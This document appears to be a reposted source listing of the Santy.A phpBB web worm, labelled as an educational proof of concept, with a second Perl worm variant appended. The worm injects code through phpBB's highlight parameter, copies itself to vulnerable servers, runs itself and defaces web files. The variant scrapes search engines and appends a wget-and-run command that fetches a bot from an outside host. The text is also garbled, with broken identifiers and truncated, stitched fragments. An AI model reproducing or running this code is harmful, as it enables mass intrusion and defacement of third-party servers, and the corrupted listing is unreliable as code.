Solution : Upgrade to phpBB version 2.0.11
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# ~~ For educational purpose ~~
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.frsirt.com/alertes/20041221.phpbbworm.php
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#!/usr/bin/perl
use
strict;
use Socket;
sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();
sub GrabURL($);
sub str2chr($);
eval{ fork and exit; };
my $generation = x;
PayLoad() if $generation > 3;
open IN, $0 or exit;
my $self = join "", <IN>;
close IN;
unlink $0;
while(!GrabURL("http://www.google.com/advanced_search")) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}
$self =~ s/my \$generation = (\d+);/"my $generation = " . ($1 + 1) . ";"/e;
my $selfFileName = "m1ho2of";
my $markStr = "HYv9po4z3jjHWanN";
my $perlOpen = "perl -e "open OUT,q(>" . $selfFileName . ") and print q(" . $markStr . ")"";
my $tryCode = "&highlight=%2527%252Esystem(" . str2chr($perlOpen) . ")%252e%2527";
while(1) {
exit if -e "stop.it";
OUTER: for my $url (GoGoogle()) {
exit if -e "stop.it";
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;
while($self =~ /(.{1,20})/gs) {
my $portion = "&highlight=%2527%252Efwrite(fopen(" . str2chr($selfFileName) . "," . str2chr("a") . "),
" . str2chr($1) . "),exit%252e%2527";
$url =~ s/&highlight=.*$//;
$url .= $portion;
next OUTER unless GrabURL($url);
}
my $syst = "&highlight=%2527%252Esystem(" . str2chr("perl " . $selfFileName) . ")%252e%2527";
$url =~ s/&highlight=.*$//;
$url .= $syst;
GrabURL($url);
}
}
sub str2chr($) {
my $s = shift;
$s =~ s/(.)/"chr(" . or d($1) . ")%252e"/seg;
$s =~ s/%252e$//;
return $s;
}
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all" . "&
q=allinurl%3A+%22viewtopic.php%22+%22" . $ts[int(rand(@ts))] . "%3D" . int(rand(30000)) .
"%22&btnG=Search";
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = "<td><a href=(/search\?q=.+?)" . "><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>";
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL("www.google.com" . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}
return @urls;
}
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);
my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join "", <Server>;
close (Server);
return $answer;
}
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
sub DoDir($) {
my $dir = $_[0];
$dir .= "/" unless $dir =~ m#/$#;
local *DIR;
opendir DIR, $dir or return;
for my $ent (grep { $_ ne "." and $_ ne ".." } readdir DIR) {
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}
closedir DIR;
}
sub Pay Load() {
my @dirs;
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};
push(@dirs, "/ ");
for my $l ("A" .. "Z") {
push(@d
for my $d (@dirs) {
DoDir($d);
}
} **************************************** while(1){
$numr = int rand(9999);
$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);
open(sites,">$arq");
print sites "";
close(sites);
$procura = "inurl:*.php?*=" . $numr;
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort
=> 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{
if ($uber !~ /cache/)
{
if ($uber !~ /"/)
{
if ($uber !~ /google/)
{
if ($uber !~ /216/)
{
if ($uber =~/http/)
{
if ($uber !~ /start=/)
{
open(arq,">>$arq");
print arq "$uber\n";
close(arq);
}}}}}}}}}
for($cadenu=1;$cadenu <= 991; $cadenu +=10){
@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1
&pstart=1&b=$cadenu") or next;
$ae = "@cade";
while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
open(a,">>$arq");
print a "$uber\n";
close(a);
}}
$ark = $arq;
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
{$sites[$a] = $_;
chomp $sites[$a];
$a++;
$b++;}
close(ae);
for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
print file "";
close(file);
open (file, ">$caxe1");
print file "";
close(file);
$k=0;
$e=0;
$data=get($sites[$a]) or next;
while($data=~ m/<a href=".*?">.*?<\/a>/){
$data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
$ubersite=$1;
if ($ubersite =~/"/)
{
$nu = index $ubersite, """;
$ubersite = substr($ubersite,0,$nu);
}
if ($ubersite !~/http/)
{$ubersite = $sites[$a]."/".$ubersite;}
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n";
close(file);
}
$lista1 = "http://server/spy.gif?&cmd=cd /tmp;wget www.server.tld/spybot.txt; perl spybot.txt";
# Other filenames included with this and other variants :
# adfkgnnodfijg
# bot
# bot.txt
# bot.txt.1
# dry.scp
# ssh.a
# terrorbot.txt
# terrorbot.txt.1
# terrorworm.txt
# terrorworm.txt.1
# unbot.txt
# unbot.txt.1
# unbot.txt.2
# unbot.txt.3
# unworm.txt
# unworm.txt.1
# unworm.txt.2
# unworm.txt.3
# worm1.txt
# worm.txt
# worm.txt.1
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
{
if ($ja[$t] =~/=/)
{
$num = rindex $ja[$t], "=";
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
$num = index $ja[$t], "=";
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
$num1 = rindex $ja[$t], ".";
$subproc = substr($ja[$t],$num1,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
}
$t++;
}
$ark = "$caxe1";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
$q=0;
$w=0;
@hot;
open (ops,"<$caxe1");
while(<ops>)
{
$hot[$q] = $_;
chomp $hot[$q];
$q++;
$w++;
}
close(ops);
for($q=0;$q<=$w;$q++)
{
if ($hot[$q] =~/http/)
{
$tipo=get($hot[$q]) or next;
}}
}
}********************* |
9570.jpg)
